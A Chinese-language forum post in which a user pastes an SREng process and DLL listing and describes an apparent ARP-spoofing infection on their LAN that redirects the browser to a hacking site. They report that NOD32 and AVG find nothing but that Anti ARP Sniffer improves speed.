    [C:\Program Files\Microsoft Office\OFFICE11\msostyle.dll]  [Microsoft Corporation, 11.0.5510]
    [C:\Program Files\Microsoft Office\OFFICE11\GdiPlus.DLL]  [Microsoft Corporation, 6.0.3260.0]
    [C:\Program Files\Common Files\Microsoft Shared\VBA\VBA6\VBE6.DLL]  [Microsoft Corporation, 6.04.9972]
    [C:\Program Files\Common Files\Microsoft Shared\VBA\VBA6\2052\VBE6INTL.DLL]  [Microsoft Corporation, 6.03.9070]
    [C:\Program Files\Common Files\Microsoft Shared\Smart Tag\CHDATEST.DLL]  [Microsoft Corporation, 2.00]
    [C:\Program Files\Common Files\Microsoft Shared\PROOF\2052\MSGR3SC.DLL]  [Microsoft Corporation, 3.0.1707.0]
    [C:\Program Files\Common Files\Microsoft Shared\Smart Tag\Chinese Measurement Converter\CHMETCNV.DLL]  [Microsoft Corp., 1.00]
    [C:\PROGRA~1\COMMON~1\MICROS~1\SMARTT~1\FNAME.DLL]  [Microsoft Corporation, 11.0.5510]
    [C:\PROGRA~1\COMMON~1\MICROS~1\SMARTT~1\2052\stintl.dll]  [Microsoft Corporation, 11.0.5510]
    [C:\Program Files\Common Files\Microsoft Shared\INK\INKOBJ.DLL]  [Microsoft Corporation, 2.0.2201.0 (xpsp1.020820-1800)]
    [C:\WINDOWS\System32\spool\DRIVERS\W32X86\3\mdiui.dll]  [Microsoft Corporation, 11.3.1897.0]
    [C:\WINDOWS\System32\spool\DRIVERS\W32X86\3\mdigraph.dll]  [Microsoft Corporation, 11.3.1897.0]
[PID: 2368][D:\专杀\sreng2\SREng.EXE]  [Smallfrogs Studio, 2.4.12.806]
    [C:\WINDOWS\system32\imon.dll]  [Eset , 2, 51, 26 ]
    [C:\Program Files\Eset\pr_imon.dll]  [N/A, ]

1楼的哥们说得太对了，我用的是nod32和AVG antispyware,都能升级，确实杀不出什么了，Anti arp sniffer我电脑上有，正在用，局域网内中毒的电脑也找到了，不过别人的电脑我也不好折腾，

浏览器使用时的情况，见图，一打开浏览器下方就显示“正在打开网页http://www.hackings.cn/...

NOD32网络检测，见图

NOD32检测情况，见图

用了ANTI ARP SNIFFER 上网速度明显改善，唉，杀毒软件什么时候才能杀光此病毒啊！中毒的机子也有杀毒软件不过看来也是于事无补，